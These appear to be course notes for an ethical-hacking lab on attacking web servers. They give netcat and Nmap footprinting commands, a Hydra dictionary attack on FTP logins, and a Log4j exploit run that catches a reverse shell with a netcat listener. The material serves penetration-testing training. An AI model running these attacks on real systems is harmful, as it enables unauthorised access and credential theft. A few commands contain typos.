Module 13: Hacking web servers

Ethical hackers or pen testers use numerous tools and techniques to hack a target web server. Recommended labs that will assist you in learning various web server hacking techniques include:

1. Footprint the web server

   • Footprint a web server using Netcat and Telnet

   • Enumerate web server information using Nmap Scripting Engine (NSE)

2. Perform a web server attack

   • Crack FTP credentials using a Dictionary Attack

   • Gain Access to Target Web Server by Exploiting Log4j Vulnerability

3. Perform a web server hacking using AI

   • Perform webserver footprinting and attacks using ShellGPT

Lab 1: Footprint the Web Server

Task 1: Footprint a Web Server using Netcat and Telnet

• Footprinting Web servers using ncat service

nc -vv www.moviescope.com 80
    GET HTTP/1.0

• FootprintingWeb servers using telnet service

telnet www.moviescope.com
    GET HTTP/1.0

Task 2: Enumerate Web Server Information using Nmap Scripting Engine (NSE)

1. nmap -sV -sC <target>
2. map -sV --script=http-enum [target website].
3. nmap --script hostmap-bfk -script-args hostmap-bfk.prefix=hostmap- [target]
4. nmap --script http-trace -d [target]
5. nmap -p[port] --script http-waf-detect [target]

Lab 2: Perform a Web Server Attack

Task 1: Crack FTP Credentials using a Dictionary Attack

 hydra -L Usernames.txt -P Passwords.txt ftp://[IP Address]

Task 2: Gain Access to Target Web Server by Exploiting Log4j Vulnerability

## Initializing vulnerable web server
docker build -t log4j-shell-poc .
docker run --network host log4j-shell-poc

## Scanning the vulnerable server 
nmap -sV -sC [target]
    If web server is  : Apache Tomcat/Coyote 1.1

## Searching exploits
searchsploit -t Apache RCE 
     Apache Log4j 2 - Remote Command Execution (RCE) exploit.

## Exploiting Services 
nc -lvp 9001
python3 poc.py --userip 10.10.1.13 --webport 8000 --lport 9001